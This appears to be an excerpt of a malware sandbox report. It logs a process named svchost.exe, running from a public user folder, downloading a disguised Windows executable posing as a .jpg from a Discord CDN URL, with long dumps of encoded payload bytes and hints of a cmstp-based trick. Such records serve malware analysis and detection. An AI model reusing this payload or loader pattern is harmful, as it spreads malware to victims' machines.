                    Data Ascii: 0 47 0 76 0 122 0 77 0 98 0 47 0 121 0 56 0 122 0 71 0 47 0 56 0 118 0 77 0 120 0 118 0 47 0 76 0 122 0 77 0 98 0 47 0 121 0 56 0 122 0 71 0 47 0 56 0 118 0 77 0 120 0 118 0 47 0 76 0 122 0 77 0 98 0 47 0 121 0 56 0 122 0 71 0 47 0 56 0 118 0 77 0 120 0 1
                    2021-10-26 16:59:39 UTC3240INData Raw: 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 31 20 30 20 39 30 20 30 20 31 31 33 20 30 20 31 30 36 20 30 20 34 37 20 30 20 36 38 20 30 20 31 31 39 20 30 20 36 35 20 30 20 37 34 20 30 20 31 31 34 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 36 20 30 20 38 32 20 30 20 37 34 20 30
                    Data Ascii: 47 0 47 0 114 0 47 0 43 0 118 0 47 0 54 0 47 0 47 0 114 0 47 0 43 0 118 0 47 0 54 0 47 0 47 0 114 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 101 0 90 0 113 0 106 0 47 0 68 0 119 0 65 0 74 0 114 0 103 0 65 0 65 0 65 0 67 0 76 0 82 0 74 0
                    2021-10-26 16:59:39 UTC3256INData Raw: 20 31 30 36 20 30 20 31 30 36 20 30 20 37 31 20 30 20 38 39 20 30 20 37 32 20 30 20 35 32 20 30 20 35 32 20 30 20 31 32 30 20 30 20 38 32 20 30 20 34 33 20 30 20 34 33 20 30 20 37 39 20 30 20 37 37 20 30 20 38 38 20 30 20 31 30 33 20 30 20 38 30 20 30 20 31 30 36 20 30 20 31 30 38 20 30 20 37 31 20 30 20 31 31 31 20 30 20 37 36 20 30 20 35 32 20 30 20 35 30 20 30 20 31 32 31 20 30 20 38 37 20 30 20 36 39 20 30 20 34 33 20 30 20 31 30 30 20 30 20 39 39 20 30 20 38 31 20 30 20 31 30 30 20 30 20 31 30 31 20 30 20 37 33 20 30 20 37 32 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 31 30 33 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 35 20 30 20 38 31 20 30 20 39 39 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 34 20 30 20 36 39 20 30
                    Data Ascii: 106 0 106 0 71 0 89 0 72 0 52 0 52 0 120 0 82 0 43 0 43 0 79 0 77 0 88 0 103 0 80 0 106 0 108 0 71 0 111 0 76 0 52 0 50 0 121 0 87 0 69 0 43 0 100 0 99 0 81 0 100 0 101 0 73 0 72 0 65 0 65 0 81 0 103 0 103 0 65 0 71 0 115 0 81 0 99 0 65 0 66 0 114 0 69 0
                    2021-10-26 16:59:39 UTC3272INData Raw: 37 20 30 20 36 35 20 30 20 39 38 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 30 39 20 30 20 36 35 20 30 20 37 31 20 30 20 35 36 20 30 20 36 35 20 30 20 39 39 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 31 36 20 30 20 36 35 20 30 20 37 31 20 30 20 36 39 20 30 20 36 35 20 30 20 31 30 30 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 32 20 30 20 36 35 20 30 20 37 31 20 30 20 35 36 20 30 20 36 35 20 30 20 39 38 20 30 20 31 30 33 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 32 20 30 20 38 31 20 30 20 36 35 20 30 20 39 38 20 30 20 31 31 39 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 32 20 30 20 38 31 20 30 20 36 35 20 30 20 39 37 20 30 20 36 35 20 30 20 36 36 20 30 20 31 30 38 20 30 20 36 35 20 30 20 36 37 20 30 20 36 35 20 30 20
                    Data Ascii: 7 0 65 0 98 0 103 0 66 0 109 0 65 0 71 0 56 0 65 0 99 0 103 0 66 0 116 0 65 0 71 0 69 0 65 0 100 0 65 0 66 0 112 0 65 0 71 0 56 0 65 0 98 0 103 0 65 0 103 0 65 0 72 0 81 0 65 0 98 0 119 0 65 0 103 0 65 0 72 0 81 0 65 0 97 0 65 0 66 0 108 0 65 0 67 0 65 0
                    2021-10-26 16:59:39 UTC3288INData Raw: 20 30 20 36 35 20 30 20 36 36 20 30 20 31 30 38 20 30 20 36 35 20 30 20 37 32 20 30 20 37 37 20 30 20 36 35 20 30 20 39 37 20 30 20 31 31 39 20 30 20 36 36 20 30 20 34 38 20 30 20 36 35 20 30 20 37 31 20 30 20 35 36 20 30 20 36 35 20 30 20 39 39 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 31 20 30 20 37 37 20 30 20 36 35 20 30 20 39 38 20 30 20 31 31 39 20 30 20 36 36 20 30 20 31 31 36 20 30 20 36 35 20 30 20 37 32 20 30 20 36 35 20 30 20 36 35 20 30 20 39 38 20 30 20 31 31 39 20 30 20 36 36 20 30 20 31 32 32 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 37 20 30 20 36 35 20 30 20 31 30 30 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 32 20 30 20 36 35 20 30 20 37 31 20 30 20 35 36 20 30 20 36 35 20 30 20 39 38 20 30 20 31 30
                    Data Ascii: 0 65 0 66 0 108 0 65 0 72 0 77 0 65 0 97 0 119 0 66 0 48 0 65 0 71 0 56 0 65 0 99 0 65 0 65 0 103 0 65 0 71 0 77 0 65 0 98 0 119 0 66 0 116 0 65 0 72 0 65 0 65 0 98 0 119 0 66 0 122 0 65 0 71 0 107 0 65 0 100 0 65 0 66 0 112 0 65 0 71 0 56 0 65 0 98 0 10
                    2021-10-26 16:59:39 UTC3304INData Raw: 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 36 35 20 30 20 36 36 20 30 20 37 30 20 30 20 36 35 20 30 20 37 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 38 32 20 30 20 38 31 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 39 20 30 20 38 39 20 30 20 36 35 20 30 20 39 37 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 35 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 36 37 20 30 20 38 31 20 30 20 36 36 20 30 20 36 36 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 39 20 30 20 36 35 20 30 20 39 38 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 39 20 30 20 38 39 20 30 20 36
                    Data Ascii: 5 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 67 0 65 0 66 0 70 0 65 0 70 0 103 0 65 0 82 0 81 0 65 0 103 0 65 0 69 0 89 0 65 0 97 0 81 0 66 0 115 0 65 0 71 0 85 0 65 0 67 0 81 0 66 0 66 0 65 0 71 0 119 0 65 0 98 0 65 0 65 0 103 0 65 0 69 0 89 0 6
                    2021-10-26 16:59:39 UTC3320INData Raw: 36 35 20 30 20 38 31 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 37 35 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 37 37 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 36 20 30 20 31 30 33 20 30 20 36 36 20 30 20 38 34 20 30 20 36 35 20 30 20 37 30 20 30 20 35 36 20 30 20 36 35 20 30 20 38 36 20 30 20 31 30 33 20 30 20 36 36 20 30 20 37 30 20 30 20 36 35 20 30 20 37 30 20 30 20 37 33 20 30 20 36 35 20 30 20 38 35 20 30 20 31 31 39 20 30 20 36 36 20 30 20 37 34 20 30 20 36 35 20 30 20 36 39 20 30 20 35 36 20 30 20 36 35 20 30 20 38 34
                    Data Ascii: 65 0 81 0 69 0 65 0 65 0 66 0 65 0 65 0 81 0 65 0 75 0 65 0 69 0 65 0 65 0 65 0 81 0 65 0 73 0 65 0 77 0 48 0 65 0 65 0 65 0 65 0 86 0 103 0 66 0 84 0 65 0 70 0 56 0 65 0 86 0 103 0 66 0 70 0 65 0 70 0 73 0 65 0 85 0 119 0 66 0 74 0 65 0 69 0 56 0 65 0 84
                    2021-10-26 16:59:39 UTC3336INData Raw: 20 30 20 36 36 20 30 20 38 31 20 30 20 36 35 20 30 20 31 31 39 20 30 20 31 30 32 20 30 20 36 38 20 30 20 36 39 20 30 20 37 36 20 30 20 37 37 20 30 20 36 35 20 30 20 31 30 37 20 30 20 37 31 20 30 20 36 35 20 30 20 34 39 20 30 20 38 35 20 30 20 36 39 20 30 20 36 36 20 30 20 31 30 34 20 30 20 37 37 20 30 20 36 37 20 30 20 38 32 20 30 20 34 38 20 30 20 37 33 20 30 20 31 32 30 20 30 20 37 31 20 30 20 31 32 32 20 30 20 36 35 20 30 20 39 30 20 30 20 36 36 20 30 20 31 30 33 20 30 20 37 38 20 30 20 38 36 20 30 20 36 36 20 30 20 36 35 20 30 20 31 30 33 20 30 20 38 34 20 30 20 36 39 20 30 20 31 30 37 20 30 20 31 30 30 20 30 20 31 32 31 20 30 20 39 30 20 30 20 38 37 20 30 20 37 30 20 30 20 34 38 20 30 20 39 30 20 30 20 38 38 20 30 20 37 33 20 30 20 31 30 33 20 30 20
                    Data Ascii: 0 66 0 81 0 65 0 119 0 102 0 68 0 69 0 76 0 77 0 65 0 107 0 71 0 65 0 49 0 85 0 69 0 66 0 104 0 77 0 67 0 82 0 48 0 73 0 120 0 71 0 122 0 65 0 90 0 66 0 103 0 78 0 86 0 66 0 65 0 103 0 84 0 69 0 107 0 100 0 121 0 90 0 87 0 70 0 48 0 90 0 88 0 73 0 103 0
                    2021-10-26 16:59:39 UTC3352INData Raw: 30 20 38 32 20 30 20 36 35 20 30 20 37 32 20 30 20 36 36 20 30 20 36 39 20 30 20 34 33 20 30 20 34 33 20 30 20 31 31 37 20 30 20 37 39 20 30 20 31 31 33 20 30 20 37 34 20 30 20 31 30 31 20 30 20 36 37 20 30 20 37 36 20 30 20 31 31 34 20 30 20 36 38 20 30 20 34 38 20 30 20 39 38 20 30 20 31 31 35 20 30 20 35 36 20 30 20 34 38 20 30 20 39 30 20 30 20 31 30 31 20 30 20 38 31 20 30 20 36 39 20 30 20 39 37 20 30 20 37 34 20 30 20 36 39 20 30 20 31 31 38 20 30 20 38 31 20 30 20 37 36 20 30 20 31 30 30 20 30 20 34 39 20 30 20 31 31 33 20 30 20 39 39 20 30 20 37 35 20 30 20 31 30 37 20 30 20 36 39 20 30 20 35 34 20 30 20 34 37 20 30 20 37 38 20 30 20 39 38 20 30 20 34 38 20 30 20 35 34 20 30 20 34 33 20 30 20 31 30 32 20 30 20 35 31 20 30 20 37 30 20 30 20 39 30
                    Data Ascii: 0 82 0 65 0 72 0 66 0 69 0 43 0 43 0 117 0 79 0 113 0 74 0 101 0 67 0 76 0 114 0 68 0 48 0 98 0 115 0 56 0 48 0 90 0 101 0 81 0 69 0 97 0 74 0 69 0 118 0 81 0 76 0 100 0 49 0 113 0 99 0 75 0 107 0 69 0 54 0 47 0 78 0 98 0 48 0 54 0 43 0 102 0 51 0 70 0 90
                    2021-10-26 16:59:39 UTC3368INData Raw: 30 20 36 36 20 30 20 31 30 30 20 30 20 34 38 20 30 20 38 35 20 30 20 31 31 31 20 30 20 31 30 36 20 30 20 31 31 36 20 30 20 36 39 20 30 20 34 39 20 30 20 38 38 20 30 20 31 31 39 20 30 20 38 39 20 30 20 38 33 20 30 20 36 36 20 30 20 37 30 20 30 20 38 35 20 30 20 31 31 39 20 30 20 37 32 20 30 20 38 31 20 30 20 38 39 20 30 20 36 38 20 30 20 38 36 20 30 20 38 32 20 30 20 34 38 20 30 20 37 39 20 30 20 36 36 20 30 20 36 36 20 30 20 38 39 20 30 20 36 39 20 30 20 37 30 20 30 20 37 31 20 30 20 35 37 20 30 20 37 38 20 30 20 31 30 34 20 30 20 31 30 33 20 30 20 31 30 32 20 30 20 38 39 20 30 20 37 37 20 30 20 31 30 35 20 30 20 31 30 31 20 30 20 31 30 31 20 30 20 37 36 20 30 20 36 37 20 30 20 31 31 30 20 30 20 38 33 20 30 20 34 38 20 30 20 36 36 20 30 20 37 37 20 30 20
                    Data Ascii: 0 66 0 100 0 48 0 85 0 111 0 106 0 116 0 69 0 49 0 88 0 119 0 89 0 83 0 66 0 70 0 85 0 119 0 72 0 81 0 89 0 68 0 86 0 82 0 48 0 79 0 66 0 66 0 89 0 69 0 70 0 71 0 57 0 78 0 104 0 103 0 102 0 89 0 77 0 105 0 101 0 101 0 76 0 67 0 110 0 83 0 48 0 66 0 77 0
                    2021-10-26 16:59:39 UTC3375INData Raw: 20 30 20 37 34 20 30 20 38 36 20 30 20 38 36 20 30 20 38 34 20 30 20 38 32 20 30 20 38 36 20 30 20 37 34 20 30 20 38 35 20 30 20 39 39 20 30 20 31 31 30 20 30 20 38 36 20 30 20 31 32 32 20 30 20 31 30 30 20 30 20 36 37 20 30 20 36 36 20 30 20 38 33 20 30 20 38 35 20 30 20 34 38 20 30 20 36 39 20 30 20 31 30 33 20 30 20 38 31 20 30 20 35 30 20 30 20 38 36 20 30 20 31 32 31 20 30 20 31 30 30 20 30 20 37 31 20 30 20 31 30 38 20 30 20 31 30 39 20 30 20 39 37 20 30 20 38 37 20 30 20 37 38 20 30 20 31 30 34 20 30 20 31 30 30 20 30 20 37 31 20 30 20 31 30 38 20 30 20 31 31 38 20 30 20 39 38 20 30 20 31 30 35 20 30 20 36 36 20 30 20 36 36 20 30 20 31 30 30 20 30 20 38 38 20 30 20 38 32 20 30 20 31 31 31 20 30 20 39 38 20 30 20 35 31 20 30 20 37 34 20 30 20 31 31
                    Data Ascii: 0 74 0 86 0 86 0 84 0 82 0 86 0 74 0 85 0 99 0 110 0 86 0 122 0 100 0 67 0 66 0 83 0 85 0 48 0 69 0 103 0 81 0 50 0 86 0 121 0 100 0 71 0 108 0 109 0 97 0 87 0 78 0 104 0 100 0 71 0 108 0 118 0 98 0 105 0 66 0 66 0 100 0 88 0 82 0 111 0 98 0 51 0 74 0 11
                    2021-10-26 16:59:39 UTC3391INData Raw: 32 20 30 20 31 30 32 20 30 20 34 38 20 30 20 31 30 34 20 30 20 36 37 20 30 20 31 31 37 20 30 20 38 34 20 30 20 39 30 20 30 20 37 34 20 30 20 38 31 20 30 20 38 31 20 30 20 38 39 20 30 20 31 31 31 20 30 20 31 32 30 20 30 20 37 32 20 30 20 37 36 20 30 20 31 30 31 20 30 20 37 32 20 30 20 39 39 20 30 20 38 33 20 30 20 31 31 36 20 30 20 38 39 20 30 20 31 31 36 20 30 20 31 30 39 20 30 20 37 34 20 30 20 31 31 33 20 30 20 36 36 20 30 20 31 31 31 20 30 20 37 35 20 30 20 31 32 31 20 30 20 37 35 20 30 20 31 31 39 20 30 20 31 31 36 20 30 20 34 39 20 30 20 31 31 30 20 30 20 35 35 20 30 20 38 35 20 30 20 31 30 34 20 30 20 34 33 20 30 20 38 32 20 30 20 38 31 20 30 20 38 39 20 30 20 35 31 20 30 20 36 37 20 30 20 37 33 20 30 20 38 38 20 30 20 37 36 20 30 20 31 30 37 20 30
                    Data Ascii: 2 0 102 0 48 0 104 0 67 0 117 0 84 0 90 0 74 0 81 0 81 0 89 0 111 0 120 0 72 0 76 0 101 0 72 0 99 0 83 0 116 0 89 0 116 0 109 0 74 0 113 0 66 0 111 0 75 0 121 0 75 0 119 0 116 0 49 0 110 0 55 0 85 0 104 0 43 0 82 0 81 0 89 0 51 0 67 0 73 0 88 0 76 0 107 0
                    2021-10-26 16:59:39 UTC3407INData Raw: 31 31 34 20 30 20 33 37 20 30 20 31 31 35 20 30 20 33 37 20 30 20 39 37 20 30 20 39 39 20 30 20 31 30 34 20 30 20 31 30 37 20 30 20 33 37 20 30 20 31 31 36 20 30 20 33 37 20 30 20 31 30 35 20 30 20 31 31 31 20 30 20 31 30 30 20 30 20 31 31 32 20 30 20 31 32 32 20 30 20 31 31 38 20 30 20 31 32 32 20 30 20 31 30 39 20 30 20 31 30 33 20 30 20 31 31 32 20 30 20 31 30 38 20 30 20 39 39 20 30 20 33 37 20 30 20 39 37 20 30 20 33 37 20 30 20 31 31 39 20 30 20 31 30 30 20 30 20 31 31 34 20 30 20 31 31 39 20 30 20 31 30 30 20 30 20 31 30 34 20 30 20 31 30 38 20 30 20 39 39 20 30 20 31 31 39 20 30 20 33 37 20 30 20 31 31 34 20 30 20 33 37 20 30 20 31 31 38 20 30 20 31 31 30 20 30 20 31 30 30 20 30 20 31 30 38 20 30 20 31 31 31 20 30 20 31 31 38 20 30 20 31 30 30 20
                    Data Ascii: 114 0 37 0 115 0 37 0 97 0 99 0 104 0 107 0 37 0 116 0 37 0 105 0 111 0 100 0 112 0 122 0 118 0 122 0 109 0 103 0 112 0 108 0 99 0 37 0 97 0 37 0 119 0 100 0 114 0 119 0 100 0 104 0 108 0 99 0 119 0 37 0 114 0 37 0 118 0 110 0 100 0 108 0 111 0 118 0 100
                    2021-10-26 16:59:39 UTC3423INData Raw: 31 30 32 20 30 20 33 37 20 30 20 33 32 20 30 20 33 37 20 30 20 31 30 38 20 30 20 31 31 31 20 30 20 31 31 36 20 30 20 33 37 20 30 20 38 37 20 30 20 33 37 20 30 20 31 31 37 20 30 20 31 30 34 20 30 20 31 31 39 20 30 20 31 31 36 20 30 20 33 37 20 30 20 31 30 30 20 30 20 33 37 20 30 20 31 32 31 20 30 20 31 31 36 20 30 20 39 38 20 30 20 31 30 37 20 30 20 31 31 32 20 30 20 31 31 36 20 30 20 31 31 35 20 30 20 39 38 20 30 20 39 38 20 30 20 31 30 33 20 30 20 33 37 20 30 20 31 30 35 20 30 20 33 37 20 30 20 31 30 35 20 30 20 39 39 20 30 20 31 31 35 20 30 20 39 38 20 30 20 31 32 31 20 30 20 31 30 36 20 30 20 31 32 32 20 30 20 31 30 39 20 30 20 31 30 32 20 30 20 31 30 30 20 30 20 31 32 32 20 30 20 39 38 20 30 20 33 37 20 30 20 38 33 20 30 20 33 37 20 30 20 39 38 20 30
                    Data Ascii: 102 0 37 0 32 0 37 0 108 0 111 0 116 0 37 0 87 0 37 0 117 0 104 0 119 0 116 0 37 0 100 0 37 0 121 0 116 0 98 0 107 0 112 0 116 0 115 0 98 0 98 0 103 0 37 0 105 0 37 0 105 0 99 0 115 0 98 0 121 0 106 0 122 0 109 0 102 0 100 0 122 0 98 0 37 0 83 0 37 0 98 0
                    2021-10-26 16:59:39 UTC3439INData Raw: 37 20 30 20 31 30 35 20 30 20 33 37 20 30 20 31 31 35 20 30 20 31 31 33 20 30 20 31 31 39 20 30 20 33 37 20 30 20 31 31 30 20 30 20 33 37 20 30 20 31 32 31 20 30 20 31 31 39 20 30 20 31 31 36 20 30 20 39 37 20 30 20 31 31 32 20 30 20 31 30 33 20 30 20 31 31 39 20 30 20 39 39 20 30 20 33 37 20 30 20 31 30 30 20 30 20 33 37 20 30 20 31 30 32 20 30 20 31 31 34 20 30 20 31 31 39 20 30 20 31 31 32 20 30 20 31 31 35 20 30 20 31 32 32 20 30 20 39 39 20 30 20 31 31 36 20 30 20 31 31 39 20 30 20 33 37 20 30 20 31 31 31 20 30 20 33 37 20 30 20 31 30 35 20 30 20 31 30 31 20 30 20 31 30 33 20 30 20 31 30 39 20 30 20 39 37 20 30 20 31 30 36 20 30 20 33 37 20 30 20 31 31 39 20 30 20 33 37 20 30 20 31 30 38 20 30 20 31 32 30 20 30 20 31 31 36 20 30 20 31 30 31 20 30 20
                    Data Ascii: 7 0 105 0 37 0 115 0 113 0 119 0 37 0 110 0 37 0 121 0 119 0 116 0 97 0 112 0 103 0 119 0 99 0 37 0 100 0 37 0 102 0 114 0 119 0 112 0 115 0 122 0 99 0 116 0 119 0 37 0 111 0 37 0 105 0 101 0 103 0 109 0 97 0 106 0 37 0 119 0 37 0 108 0 120 0 116 0 101 0
                    2021-10-26 16:59:39 UTC3455INData Raw: 20 30 20 36 37 20 30 20 36 39 20 30 20 39 35 20 30 20 36 37 20 30 20 37 39 20 30 20 37 37 20 30 20 37 37 20 30 20 36 35 20 30 20 37 38 20 30 20 36 38 20 30 20 39 35 20 30 20 37 36 20 30 20 37 33 20 30 20 37 38 20 30 20 36 39 20 30 20 30 20 39 20 34 37 20 30 20 39 37 20 30 20 31 31 37 20 30 20 33 32 20 30 20 30 20 31 31 20 39 39 20 30 20 31 30 39 20 30 20 31 31 35 20 30 20 31 31 36 20 30 20 31 31 32 20 30 20 30 20 31 35 20 31 32 33 20 30 20 36 39 20 30 20 37 38 20 30 20 38 34 20 30 20 36 39 20 30 20 38 32 20 30 20 31 32 35 20 30 20 30 20 31 33 32 20 31 34 33 20 39 31 20 30 20 31 31 38 20 30 20 31 30 31 20 30 20 31 31 34 20 30 20 31 31 35 20 30 20 31 30 35 20 30 20 31 31 31 20 30 20 31 31 30 20 30 20 39 33 20 30 20 31 33 20 30 20 31 30 20 30 20 38 33 20 30
                    Data Ascii: 0 67 0 69 0 95 0 67 0 79 0 77 0 77 0 65 0 78 0 68 0 95 0 76 0 73 0 78 0 69 0 0 9 47 0 97 0 117 0 32 0 0 11 99 0 109 0 115 0 116 0 112 0 0 15 123 0 69 0 78 0 84 0 69 0 82 0 125 0 0 132 143 91 0 118 0 101 0 114 0 115 0 105 0 111 0 110 0 93 0 13 0 10 0 83 0
                    2021-10-26 16:59:39 UTC3471INData Raw: 32 39 20 31 38 20 31 32 35 20 36 20 33 32 20 31 20 31 20 31 38 20 31 32 39 20 31 33 33 20 35 20 30 20 30 20 31 38 20 31 33 30 20 34 39 20 35 20 33 32 20 30 20 31 38 20 31 32 39 20 37 37 20 35 20 33 32 20 30 20 31 38 20 31 32 39 20 38 35 20 35 20 30 20 30 20 31 38 20 31 33 30 20 35 33 20 35 20 33 32 20 31 20 31 20 32 39 20 33 20 33 31 20 33 32 20 36 20 31 38 20 31 30 39 20 31 34 20 32 31 20 31 38 20 31 32 39 20 36 39 20 32 20 31 38 20 31 32 39 20 37 33 20 31 38 20 31 32 39 20 37 37 20 32 31 20 31 38 20 31 32 39 20 38 31 20 34 20 31 38 20 31 32 39 20 37 37 20 31 34 20 32 20 31 38 20 31 30 39 20 32 20 32 20 31 34 20 36 20 33 32 20 31 20 31 34 20 31 38 20 31 33 30 20 36 35 20 34 20 32 39 20 31 38 20 31 32 39 20 39 37 20 35 20 37 20 32 20 38 20 32 39 20 35 20
                    Data Ascii: 29 18 125 6 32 1 1 18 129 133 5 0 0 18 130 49 5 32 0 18 129 77 5 32 0 18 129 85 5 0 0 18 130 53 5 32 1 1 29 3 31 32 6 18 109 14 21 18 129 69 2 18 129 73 18 129 77 21 18 129 81 4 18 129 77 14 2 18 109 2 2 14 6 32 1 14 18 130 65 4 29 18 129 97 5 7 2 8 29 5


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    4192.168.2.349696162.159.134.233443C:\Users\Public\Documents\???????????????\svchost.exe
                    TimestampkBytes transferredDirectionData
                    2021-10-26 16:59:45 UTC3478OUTGET /attachments/893177342426509335/897185985257963540/5D70BEC8.jpg HTTP/1.1
                    Host: cdn.discordapp.com
                    Connection: Keep-Alive
                    2021-10-26 16:59:45 UTC3478INHTTP/1.1 200 OK
                    Date: Tue, 26 Oct 2021 16:59:45 GMT
                    Content-Type: image/jpeg
                    Content-Length: 1023400
                    Connection: close
                    CF-Ray: 6a453cab5b8f42db-FRA
                    Accept-Ranges: bytes
                    Age: 1281607
                    Cache-Control: public, max-age=31536000
                    ETag: "6120be0358fed446c42e1349cbecf6f0"
                    Expires: Wed, 26 Oct 2022 16:59:45 GMT
                    Last-Modified: Mon, 11 Oct 2021 18:16:47 GMT
                    Vary: Accept-Encoding
                    CF-Cache-Status: HIT
                    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                    Cf-Bgj: h2pri
                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                    x-goog-generation: 1633976207854460
                    x-goog-hash: crc32c=O7ubRQ==
                    x-goog-hash: md5=YSC+A1j+1EbELhNJy+z28A==
                    x-goog-metageneration: 1
                    x-goog-storage-class: STANDARD
                    x-goog-stored-content-encoding: identity
                    x-goog-stored-content-length: 1023400
                    X-GUploader-UploadID: ADPycdsek7nfLCBgq3CiyQdT8Mtqc98BgMYNhM2ST5khIifXuRTmOm87PegTlyuCm40PG1fzO_R3cOMiu2jb9YPIgu2hcteOPQ
                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qcYCHjhsz3%2FZEphzA8pq14d2McUdFG%2FLPQ9WuxohG3swh3evLtGQ6xP7c6gX%2B6ZRgscsF9fpYITo4I81BF%2FDWg6FoSFBY%2BuS7wZQ5aDtrvCs8Pihr1Ip0sc6YgA6wi083ch9Aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    2021-10-26 16:59:45 UTC3480INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                    Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                    2021-10-26 16:59:45 UTC3480INData Raw: 37 37 20 39 30 20 31 34 34 20 30 20 33 20 30 20 30 20 30 20 34 20 30 20 30 20 30 20 32 35 35 20 32 35 35 20 30 20 30 20 31 38 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 36 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 31 32 38 20 30 20 30 20 30 20 31 34 20 33 31 20 31 38 36 20 31 34 20 30 20 31 38 30 20 39 20 32 30 35 20 33 33 20 31 38 34 20 31 20 37 36 20 32 30 35 20 33 33 20 38 34 20 31 30 34 20 31 30 35 20 31 31 35 20 33 32 20 31 31 32 20 31 31 34 20 31 31 31 20 31 30 33 20 31 31 34 20 39 37 20 31 30 39 20 33 32 20 39 39 20 39 37 20 31 31 30 20 31 31 30 20 31 31 31 20 31 31 36 20
                    Data Ascii: 77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116
                    2021-10-26 16:59:45 UTC3481INData Raw: 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 34 20 30 20 30 20 30 20 32 32 20 30 20 30 20 30 20 32 34 20 30 20 30 20 30 20 36 34 20 30 20 30 20 30 20 36 36 20 30 20 30 20 30 20 36 38 20 30 20 30 20 30 20 37 30 20 30 20 30 20 30 20 37 32 20 30 20 30 20 30 20 37 34 20 30 20 30 20 30 20 37 36 20 30 20 30 20 30 20 39 32 20 30 20 30 20 30 20 39 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 38 20 30 20 30 20 30 20 31 32 20 30 20 30 20 30 20 31 36 20 30 20 30 20 30 20 32 32 20 30 20 30 20 30 20 32 38 20 30 20 30 20 30 20 33 32 20 30 20 30 20 30 20 34 30 20 30 20 30 20 30 20 34 34 20 30 20 30 20 30 20 35 32 20 30 20 30 20
                    Data Ascii: 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 0 22 0 0 0 24 0 0 0 64 0 0 0 66 0 0 0 68 0 0 0 70 0 0 0 72 0 0 0 74 0 0 0 76 0 0 0 92 0 0 0 94 0 0 0 0 0 0 0 8 0 0 0 12 0 0 0 16 0 0 0 22 0 0 0 28 0 0 0 32 0 0 0 40 0 0 0 44 0 0 0 52 0 0
